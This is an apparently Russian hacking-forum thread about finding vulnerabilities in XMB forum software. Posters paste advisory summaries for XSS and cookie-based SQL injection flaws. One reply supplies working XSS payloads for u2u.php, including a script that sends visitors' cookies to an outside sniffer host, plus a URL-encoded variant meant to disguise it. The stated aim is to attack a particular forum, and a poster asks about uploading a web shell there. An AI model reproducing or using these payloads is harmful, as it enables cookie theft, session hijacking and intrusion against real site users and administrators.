![]() |
Есть ли уязвимости у Xmb ?
Обыскал форум через поиск по запросу Xmb выдал только 1 статью да и то не по уязвимости, неужели у этого форума совсем нет уязвимостей ? на секьюрити лаб все статьи по старым форумам, 1.5, 1.6 1.8
если не увидел чего .. ткните носом |
Форум просто не сильнопопулярный по этому особо нечего и нет....
Я поищу если что найду стоящие то выложу.... Тебя какие версий интересуют ? |
[CODE]Программа: XMB 1.9.3 и более ранние версии
Опасность: Низкая Наличие эксплоита: Нет Описание: Уязвимость позволяет удаленному пользователю произвести XSS нападение. Уязвимость существует при обработке поля "Your Current Mood" при регистрации учетной записи. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный HTML код в браузере жертвы в контексте безопасности уязвимого сайта. Программа: XMB 1.9.3, возможно более ранние версии Опасность: Средняя Наличие эксплоита: Нет Описание: Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметрах файла куки в сценарии today.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения Программа: XMB Forum 1.9.3 и более ранние версии Опасность: Низкая Наличие эксплоита: Да Описание: Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей. Уязвимость существует при обработке входных данных в параметре username сценария u2u.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Пример: http://[host]/u2u.php?action=send&username= Код:
Код:
http://www.securitylab.ru/vulnerability/page1_670.php?page=1_670&arrFilter_ff%5BSECTION_ID%5D=&arrFilter_ff%5BSEARCHABLE_CONTENT%5D=xmb&set_filter=%D4%E8%EB%FC%F2%F0&set_filter=Y |
на Xmb есть очень хорошоя SQL-инъекция котороя существует из за недостаточной обработки входных данных в параметрах файла куки в сценарии today.php .
|
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.
Уязвимость существует из-за недостаточной обработки входных данных в параметрах файла куки в сценарии today.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения А какой запрос делать чтобы хэш увидеть у первого id ?? |
вот вот я тоже бы хотел это узнать, хотя я в этом сильно сомневаюсь, похожая описанной уязвимости была насколько я помню в phpBB 2.0.6 , не думаю что xmb не исправило эту багу
|
Возможно нет вслудуйщей мне кажеться залатают дыру
|
да кстати версия которая меня интерисует 1.9.5
а по поводу распространенности, то считаю его зря подзабыли орум классный и по функциональности давно обогнал phpBB в стандартной комплектации |
Зарегайся на форуме и проверь xss
Код:
http://[адресс форума]/u2u.php?action=send&username=<script>alert('lol')</script>Код:
http://[адресс форума]/u2u.php?action=send&username=<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>но можно немного скрипт сниффа приныкать но можно лучше сныкать Код:
http://[адресс форума]/u2u.php?action=send&username=%3Cscript%3Eimg+%3D+new+Image%28%29%3B+img.src+%3D+%22http%3A%2F%2Fantichat.ru%2Fcgi-bin%2Fs.jpg%3F%22%2Bdocument.cookie%3B%3C%2Fscript%3Eтебе придётся ждать долго чтоб он записал свои данные в лог тебе надо будет ждать и палить лог http://antichat.ru/sniff/log.php Но можно на хостинге свой поставить и чтобы он в текстовик их писал так удобней будет :) Вся эта шняга на 1.8 точно пашет ну ещё должна на 1.9.3 |
в этом то вся и проблема, админ не ламер в принципе, рега закрыта и дает регится он только проверенным пользователям, может можно как нибудь шелл залить ?
|
| Время: 03:49 |